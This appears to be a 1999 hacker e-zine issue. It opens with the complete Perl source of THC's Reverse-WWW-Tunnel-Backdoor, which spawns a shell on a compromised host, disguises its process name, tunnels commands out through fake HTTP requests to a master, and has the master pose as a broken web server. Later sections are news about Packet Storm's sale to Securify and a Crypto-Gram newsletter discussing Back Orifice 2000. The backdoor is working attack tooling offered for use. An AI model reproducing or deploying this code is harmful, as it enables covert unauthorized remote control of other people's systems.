s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----




----[ THE CODE


<++> rwwwshell.pl
#!/usr/bin/perl
# Reverse-WWW-Tunnel-Backdoor v1.5
# (c) 1998 by van Hauser / [THC] - The Hacker's Choice <vh@reptile.rug.ac.be>
# Check out http://r3wt.base.org for updates

#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="localhost"; # the host to run on (ip/dns) (the SLAVE needs this!)

#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
$TIME="00:01"; # time when to connect to the master (unset if now)
$DAILY="sure"; # tries to connect once daily if set with something
$PROXY=""; # set this with the Proxy if you must use one
$PROXY_PORT=""; # set this with the Proxy Port if you must use one

# END OF CONFIG # nothing for you to do after this point #

################## BEGIN MAIN CODE ##################

require 5.002;
use Socket;

$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');

if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
exit(0);
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
}

if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION

############### SLAVE FUNCTION ###############

sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = "GET " . $CGI_PREFIX;
}
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
if ($DAILY) { # if we must connect daily, we
if (fork) { # we fork the daily shell process
sleep(69); # to ensure the master control proc.
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
select($r = $rs, undef, undef, 30);
sleep(1);
$output = "";
vec($ws, fileno(W_OUT), 1) = 1;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print W_OUT "\000" || goto END;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded . "\n";
connect(THC, $remote) || goto END; # connect to master
send (THC, $encoded, 0) || goto END; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
while (! select($r = $rt, undef, undef, 0.00001)) {}
while (1) { # read until EOD (End Of Data)
recv (THC, $readin, 1, 0) || goto OK;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
}
OK: $input =~ s/\n//gs;
&uudecode; # decoding the data from the master
goto END if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print W_IN "$decoded" || goto END; # sending the data
sleep(1); # to the shell proc.
goto GO;
}
END: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION

############### MASTER FUNCTION ###############

sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.4 by van Hauser / THC ...

Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view a binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';

YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || print STDOUT "disconnected\n";
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
}
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION

###################### MISC. FUNCTIONS #####################

sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"
'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# a proxy drops the request if > 8kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "
a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
$encoded = $encoded . "
HTTP/1.0\n" if ($SLAVE_MODE);
} # END OF UUENCODE FUNCTION

sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"
`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION

sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION

# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>

<-->


----[ EOF


--- CUT HERE ---



Ciao...
van Hauser / THC - [The Hacker's Choice]


THC's Webpage -> http://merlin.koeln-net.com/~plasmoid/thc


Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----

@HWA

08.0 PacketStorm Security Sells Out?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Who's going to pick up the slack now that Ken has removed himself from
affiliation with Packet Storm? the following sounds well and good but
will this company (Securify) have the same contacts and receive updates
as frequently as Ken used to? I doubt it...well it looks like PSS will
be relegated to being just an archive of old security tools and exploits
hopefully the new system will at least do the old one some justice and
preserve the layout meanwhile we wish Ken WIlliams the best of luck in
his new job whatever that may be.... - Ed

From HNN http://www.hackernews.com

Packet Storm Moves to Kroll-O'Gara


contributed by jkw
As mentioned in the HNN rumors section last week Ken
Williams has sold the rights to Packet Storm Security to
Securify, the Information Security Group of The
Kroll-O'Gara Company. Ken Williams will no longer be
running the site and has accepted a different job within
the Information Security industry. Securify hopes to
have the site operational and online sometime in
September.

Old PSS - With Letter from Ken Williams and Securify
Press Release
New PSS
http://www.securify.com/packetstorm/

Late Update
Wow, this made it into the New York Times.

NY Times - Registration Required
http://www.nytimes.com/library/tech/99/08/biztech/articles/17secure.html


August 17, 1999


Security Firm to Revive
Computer-Defense Site

By PETER WAYNER

roll-O'Gara, the international security consulting firm, said Monday
it would take over an Internet site that not only posted information
about defending computer systems against attacks but also told how to
break into them.

In the shadowy world of hackers and crackers, it is often hard to tell the
good guys from the bad. Computer-security experts frequently test
systems by breaking into them, and the site, Packet Storm, posted
descriptios of those break-ins.

Kroll-O'Gara's computer security unit, Securify, which declined to
discuss financial terms of its acquisition, said it planned to maintain the
site's tradition of high-quality information as a way to market its services.
But Kroll-O'Gara executives said that it would rid the site of its more
contentious publications.

"We see it, from a corporate standpoint, as somewhat risky and
controversial,"
Charles Breed, Securify's vice president for marketing,
acknowledged. "We'll be publishing a site with very powerful tools and
they can be used for good or evil. Our opinion is that it's better to make
knowledge available than keeping it obscure or hidden."


Tommy Ward, a project manager at Securify, said three Securify
employees would comb through the site, "sanitizing content."

Until late June, Harvard University provided Packet Storm as a service
and picked up the costs of answering requests for more than 10
gigabytes of data traffic a day.

The site, which was edited by Ken Williams, a security consultant not
associated with the university, proved popular with many computer
experts because it collected detailed technical information about the
methods intruders use to exploit weaknesses in computers. These
often-fascinating narratives were mixed with discussions about how to
help systems withstand assault.

Harvard dropped the site in late June after the host of a rival site
complained that Packet Storm had posted defamatory information.

Joe Wrinn, a university spokesman, said, "We're happy that the site will
be online again. That's the original reason we got involved."


Williams called the site "a labor of love," but said it was taking 60 to 80
hours a week to maintain. He will not be associated with the site, which
will be run by Securify employees at Securify.com.

Since Harvard pulled the plug, the site has been inaccessible; computer
professionals looked forward to its relaunch, expected in late September.
"I'm glad that the compendium of information is going to be preserved,"
said Adam Shostack, a computer security consultant.


-=-

Here's the index.html file from the original location of PacketStorm Security
with Ken's message and the Securify press release...


-=-

http://www.genocide2600.com/~tattooman/index.html

To The Supporters of Packet Storm Security:

As you may already be aware, there have been numerous rumors
on the Net recently regarding the revival of Packet Storm
Security through corporate sponsorship. I am pleased to
announce that the rumours are indeed true, and that Packet
Storm will now be hosted by Securify, the Information Security
Group of Kroll-O'Gara.

I have carefully considered the direction and future of PSS
since it was taken down by Harvard, and have entertained
innumerable offers from a wide variety of corporate, non-profit,
and private entities to host the site. Kroll-O'Gara has
presented me with the most impressive vision and plans for PSS.
Not only does Kroll-O'Gara intend to preserve the original
ideals and intent of PSS, but they have developed an exciting
and definitive roadmap for the logical evolution of the site.

Packet Storm Security had reached a stage where it was much
more than a full time job for one person. For the last year
I have been working a minimum of 60 hours a week to maintain
the high quality of the site.

In order to sustain my vision of PSS as *the* resource on the
Internet for freeware Information Security tools, it became
necessary to acquire the resources that only a dedicated
corporate sponsor could provide. I have talked at length with
Matt Barrie (PSS Program Manager) at Kroll-O'Gara ISG, and I
believe that they have grand and noble goals for the future of
Packet Storm Security.

Unfortunately, I will not be with PSS in the future, however,
because I have recently accepted an extremely enticing offer
elsewhere in the Information Security industry. I do,
nevertheless, give my strongest support to the new maintainers
of the site, and I'm excited about what's in store for the
future of PSS.

To all of my valued friends and supporters of the site:
I sincerely hope that you too will continue through your
contributions and suggestions to help make Packet Storm what
it was! Your support has been and will continue to be invaluable
in ensuring that PSS is *the* resource for freeware Information
Security tools.

Respectfully,

Ken Williams
Founder
Packet Storm Security



********** PRESS RELEASE **********

For more information, contact:

Vicky Wu Charles Breed
PR Manager VP of Marketing
KVO Public Relations Securify, Kroll-O'Gara Company
(650) 919-2027 (650) 812-9400 x107
vicky_ku@kvo.com cbreed@securify.com

Matt Barrie
matt@securify.com
packetstorm@securify.com


KROLL-O'GARA INFORMATION SECURITY GROUP ACQUIRES PACKET STORM, THE PREMIER
WEB SITE FOR INFORMATION SECURITY TOOLS & DATA


Packet Storm Security is positioned to be the Internet's largest single
source for computer security threat information, tools and patches



PALO ALTO, Calif., August, 17, 1999 In response to the growing demand for
current and accurate information and tools on computer security, Securify,
the Information Security Group of The Kroll-O'Gara Company (Nasdaq: KROG),
announced today the acquisition of Packet Storm Security; a website
created and maintained by Ken Williams, a renowned computer security
expert. Averaging over 400,000 hits per day, generating over 7 gigabytes
of traffic, Packet Storm Security is an established resource for many
government agencies and major corporations.


"Packet Storm Security provides a strong, long term Internet presence for
Securify,"
states Dr. Taher Elgamal, President of Securify. "It is a state
of the art resource for our customers and we see it as the nucleus for a
number of exciting additional security management services."



Packet Storm is one of the largest and most well recognized information
security resources on the Internet today. The site consists of over 45,000
security related programs, such as up to date tools, patches, advisories,
vulnerabilities. Considering this massive repository of information,
Packet Storm Security is the ideal site for finding up-to-date information
on the latest threats that face corporate networks and computer systems.
This site has been frequented by system administrators, engineers,
programmers, from organizations such as AT&T, DoD, NSA, FBI, IBM,
Microsoft, GTE, ISS, KPMG, E&Y, InterNIC, Alcatel, NCSC, McAfee, NIST,
USAF, Sprint CA, UK Govt., Mitre, Allied Signal, and CitiGroup bank.


"Our customers have asked for a single source data point to inform and
educate them on the ever increasing number of information security
threats,"
states Jules Kroll, CEO and Chairman of Kroll-O'Gara Inc. "We
will be dedicating a significant effort to making this site extremely
useful for anyone involved with computer security."



Packet Storm Security is in the process of being updated and refined prior
to being posted in September at http://www.securify.com/packetstorm



# # #

About Securify, the Information Security Group of Kroll-O'Gara
Securify, the Information Security Group of Kroll-O^Gara is composed of
highly regarded industry experts that provide objective information
security services to businesses and government agencies. These services
include network and system security review and repair, product assessment,
the creation and implementation of secure e-commerce sites, architecture
and design.

They also employ internally developed proprietary software that combines
best-of-breed security tools and client information to analyze and assess
network security issues as a scientific discipline. Their approach
employs standard, well-tested methodology, and treats security as both a
business and a technical issue. The Information Security Group is unique
in the security field in that it not only provides the assessment and
recommendations, but also actual implementation and deployment. For more
information, please access their web site at www.securify.com, or contact
the company at (650) 812-9400. Contact Vicki Wu of KVO Public Relations at
(650) 919-2027.

About The Kroll-O'Gara Company
The Kroll-O'Gara Company is a leading global provider of a broad range of
specialized products and services designed to supply solutions to a
variety of security needs. Kroll-O'Gara provides governments, business,
and individuals with information, analysis, training, and products to
mitigate the growing risks associated with white-collar crimes, fraud,
physical attacks, threats of violence, and uninformed decisions based upon
incomplete or inaccurate information. The company is organized into four
primary business groups: Investigations & Intelligence Group, Security
Products & Services Group, Voice and Data Security Group, and the
Information Security Group. Based in New York City, New York, and
Fairfield, Ohio, Kroll-O'Gara employs more than 2,600 people in 60 offices
and plants around the world. For more information, please access the
company's web sites at www.securify.com or www.kroll-ogara.com.


@HWA

09.0 CryptoGram Aug 15th '99
~~~~~~~~~~~~~~~~~~~~~~~


From: Bruce Schneier <schneier@counterpane.com>



CRYPTO-GRAM


August 15, 1999


by Bruce Schneier
Founder and CTO
Counterpane Internet Security, Inc.
schneier@counterpane.com
http://www.counterpane.com



A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.


Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.


Copyright (c) 1999 by Bruce Schneier



CRYPTO-GRAM now has over 20,000 subscribers!



** *** ***** ******* *********** *************


In this issue:
Back Orifice 2000
Counterpane -- Featured Research
News
Counterpane Systems News
NIST AES News
The Doghouse: HPUX and the UNIX Crypt Algorithm
Web-Based Encrypted E-Mail
Comments from Readers



** *** ***** ******* *********** *************


Back Orifice 2000




Back Orifice is a free remote administration tool for Microsoft Windows.
It's also one of the coolest hacking tools ever developed. Originally
released last July, Back Orifice 2000 (BO2K) is the current release of the
software. It works on Windows 95, Windows 98, and Windows NT. It is much
better written than the original Back Orifice. And it's free, and open source.


There are two parts: a client and a server. The server is installed on the
target machine. The client, residing on another machine anywhere on the
Internet, can now take control of the server.


This is actually a legitimate requirement. Perfectly respectable programs,
like pcAnywhere or Microsoft's own Systems Management Server (SMS), do the
same thing. They allow a network administrator to remotely troubleshoot a
computer. They allow a remote tech support person to diagnose problems.
They are mandatory in many corporate computing environments.


Remote administration tools also have a dark side. If the server is
installed on a computer without the knowledge or consent of its owner, the
client can effectively "own" the victim's PC.


Back Orifice's difference is primarily marketing spin. Since it is not
distributed by a respectable company, it cannot be trusted. Since it was
written by hackers, it is evil. Since its malicious uses are talked about
more, its benevolent uses are ignored. That's wrong; pcAnywhere is just as
much an evil hacking tool as Back Orifice.


Well, not exactly. Back Orifice was designed by a bunch of hackers with
fun in mind. Not only can the client perform normal administration
functions on the server's computer -- upload and download files, delete
files, run programs, change configurations, take control of the keyboard
and mouse, see whatever is on the server's screen -- but it can also do
more subversive things: reboot the computer, display arbitrary dialog
boxes, turn the microphone or camera on and off, capture keystrokes (and
passwords). And there is an extensible plug-in language for others to
write modules. (I'm waiting for someone to write a module that
automatically sniffs for, and records, PGP private keys.)


Back Orifice is also designed to hide itself from the server's owner.
Unless the server's owner is knowledgeable (and suspicious), he will never
know that Back Orifice is running on his computer. (Other remote
administration tools, even SMS, also have stealth modes; Back Orifice is
just better at it.) Anti-virus software has been updated to detect default
Back Orifice configurations, but that will only solve most of the problem.
Because Back Orifice is configurable, because it can be downloaded in
source form and then recompiled to look different...I doubt that all
variants will ever be discovered.


Okay, so who's to blame here? The Cult of the Dead Cow wrote and released
Back Orifice. Surely the world is not a safer place because, as CDC's Sir
Dystic put it: "every 14-year-old who wants to be a hacker will try it."
BO2K's slogan is "show some control," and many will take that imperative
seriously. Back Orifice will be used by lots of unethical people to do all
sorts of unethical things. And that's not good.


On the other hand, Back Orifice can't do anything until the server portion
is installed on some victim's computer. This means that the victim has to
commit a security faux pas before anything else can happen. Not that this
is very hard: lots of people network their computers to the Internet
without adequate protection. An attacker can even ask the victim to
install Back Orifice (social engineering might help); the Worm.ExploreZip
worm of this spring did exactly that. Still, if the victim is sufficiently
vigilant, he can never be attacked by Back Orifice.


But what about Microsoft's computing environment?

  
One of the reasons Back
Orifice is so nasty is that Microsoft doesn't design its operating systems
to be secure. It never has. Any program that runs in Microsoft Windows 95
and 98 can do anything. In Unix, an attacker would first have to get root
privileges. Not in Windows. There's no such thing as limited privileges,
or administrator privileges, or root privileges. Microsoft assumes that
anyone who can run a program can reformat the hard drive. This might have
made some sense in the age of isolated desktop computers; after all, if you
could run a program, you were standing in front of the machine. But on the
Internet, this is absurd.


Windows NT was designed as a secure operating system, more or less. There
are provisions to make Windows NT a very secure operating system, such as
privilege levels in separate user accounts, file permissions, and kernel
object access control lists. However, the configuration that makes Windows
NT secure is very very far and distant from the default installed
configuration. Microsoft admits this. You have to make 300+ security
checks and modifications to Windows NT to make it secure in its default
configuration. And on top of this, Microsoft assumes that most users have
Administrator access to their desktop machines anyway. They only really
worry about network security, not host-end security, which is where they
are seriously vulnerable to attacks like Back Orifice 2000. Windows NT
could be secure, but Microsoft refuses to ship the OS in that condition
(presumably they worry that their spiffy animated fading menu bars may be
overlooked).


Malicious remote administration tools are a major security risk. What Back
Orifice has done is made mainstream computer users aware of the danger.
Maybe the world would have been safer had they not demonstrated the danger
so graphically, but I am not sure. There are certainly other similar tools
in the hacker world -- one, called BackDoor-G, has recently been discovered
-- some developed with much more sinister purposes in mind. And Microsoft
only responds to security threats if they are demonstrated. Explain the
threat in an academic paper and Microsoft denies it; release a hacking tool
like Back Orifice, and suddenly they take the vulnerability seriously.


Back Orifice Home Page:
http://www.bo2k.com/


Commentary:
http://www.zdnet.com/zdnn/stories/news/0,4586,2127049,00.html
http://www.infoworld.com/cgi-bin/displayArchive.pl?/99/30/o03-30.36.htm


Microsoft's Systems Management Server:
http://www.microsoft.com/smsmgmt/techdetails/remote.asp
http://www.cultdeadcow.com/news/pr19990719.html


BackDoor-G:
http://www.zdnet.com/zdnn/stories/news/0,4586,2267379,00.html



** *** ***** ******* *********** *************


Counterpane -- Featured Research




"Notes on the Design and Analysis of the Yarrow Cryptographic Pseudorandom
Number Generator"


J. Kelsey, B. Schneier, and N. Ferguson, Sixth Annual Workshop on Selected
Areas in Cryptography, Springer Verlag, August 1999, to appear.


We describe the design of Yarrow, a family of cryptographic pseudo-random
number generators (PRNG). We describe the concept of a PRNG as a separate
cryptographic primitive, and the design principles used to develop Yarrow.
We then discuss the ways that PRNGs can fail in practice, which motivates
our discussion of the components of Yarrow and how they make Yarrow secure.
Next, we define a specific instance of a PRNG in the Yarrow family that
makes use of available technology today.


http://www.counterpane.com/yarrow-notes.html



** *** ***** ******* *********** *************


News



Major irony alert: President Clinton signs a bill into law using PGP.
http://www.wired.com/news/news/politics/story/20775.html


A new U.K. bill on e-commerce has the nasty provision that police will be
able to demand access to encryption keys if they suspect criminal use of
the Internet. Those who refuse get a two-year prison sentence.
http://www.wired.com/news/news/politics/story/20937.html
http://techweb.com/news/story/TWB19990726S0010
Text of the bill:
http://www.dti.gov.uk/cii/elec/ecbill.html
Foundation for Internet Policy Research commentary on the bill:
http://www.fipr.org/ecommpr.html


The first three chapters of Alan Turing's treatise on the Enigma, retyped
from the only known paper copy, are available at:
http://home.cern.ch/~frode/crypto/Turing/index.html


The L0pht has released an anti-sniffer tool. It detects sniffers on
networks. Unfortunately, at least one sniffer-detection-resistant sniffer
has been released. And the race continues....
http://www.wired.com/news/news/technology/story/20913.html
L0pht: http://www.l0pht.com/


The Information Society, an academic journal, published a special issue on
anonymity and the Internet: vol. 15, no. 2. Actually, there are
interesting articles in most of the back issues.
http://www.slis.indiana.edu/TIS/tables_of_contents/toc.html


The Encrypting File System (EFS) built into Microsoft Windows 2000 has been
broken.
http://www.ntsecurity.net/forums/2cents/news.asp?IDF=118&TB=news
Microsoft claims that it has not, that the attack is predicated on the user
doing something wrong: leaving the EFS recovery key on the machine.
http://www.microsoft.com/security/bulletins/win2kefs.asp
The author's reply:
http://www.ntsecurity.net/forums/2cents/GetMessage.asp?RootID=2092&ID=2102&I
DF=118&TB=news
I reserve judgment, not having studied EFS, the attack, or Microsoft's
response.


In late May, Janet Reno wrote to German Federal Secretary of Justice Herta
Daubler-Gmelin, asking him to control the distribution of encryption
software over the Internet.
http://www.heise.de/tp/deutsch/inhalt/te/5117/2.html


There's another version of Melissa floating around. This one uses the
".all" extensions in Microsoft Outlook to crash systems. Clever idea,
actually.
http://www.computerworld.com/home/print.nsf/all/990719B50A


This rather impressive espionage device is being sold as a home consumer item:
http://www.x10.com/home/offer.cgi?!ZDX30,../1index761.htm


There has been considerable hoo-hah over a U.S. government plan to monitor
private networks for intrusion, and invade a lot of privacy in the process.
(This will all be at the consent of the various companies, so warrants are
not required.) It's called Fidnet, for Federal Intrusion Detection Network.
http://www12.nytimes.com/library/tech/99/07/biztech/articles/28compute.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2304083,00.html?chkpt=hpqs014
http://www.sjmercury.com/svtech/news/indepth/docs/secure072999.htm
http://techweb.com/wire/story/TWB19990729S0013
http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html
http://www.infoworld.com/cgi-bin/displayStory.pl?990730.enstarwars.htm
EPIC's "Critical Infrastructure Protection and the Endangerment of Civil
Liberties"
http://www.epic.org/security/infowar/epic-cip.html
Copy of the White House plan, and commentary:
http://www.cdt.org/policy/terrorism/fidnet/


The House Appropriations Committee has approved a $36 billion budget for
the departments of Justice, Commerce and State, but included language
specifically barring any spending on FIDNET.
http://www.techweb.com/wire/story/reuters/REU19990730S0005


And the U.S. government backpedals.
http://www.fcw.com/pubs/fcw/1999/0802/fcw-newssecurityside-08-02-99.html


AOL has been hit by an ingenious social engineering attack. This hoax
message, masquerading as a hoax warning, fools users into giving up account
and credit card information.
http://www.zdnet.com/zdnn/stories/news/0,4586,2303536,00.html


The FBI is preventing CMI Communications, a Canadian company, from offering
satellite phone service in the U.S. because the FBI can't eavesdrop on the
calls.
http://www.nationalpost.com/financialpost.asp?f=990716/29896.html


California adopted a new digital signature law, allowing brokerages to use
signed e-mail for contracts.
http://www.computerworld.com/home/news.nsf/all/9907294dig


The case against Kevin Mitnick has finally been dropped.
http://www.msnbc.com/news/178825.asp


Congressman Porter Goss (R-Fla) wants to offer a tax break to companies
that develop encryption products that enable key recovery or other methods
of giving the government access to the encryption keys.
http://www.wired.com/news/news/politics/story/21014.html


A new Excel vulnerability allows a malicious spreadsheet to execute
arbitrary code without the user's permission.
http://www.securityportal.com/list-archive/bugtraq/1999/Jul/0268.html
http://www.zdnet.com/zdnn/stories/news/0,4586,2305495,00.html?chkpt=hpqs014
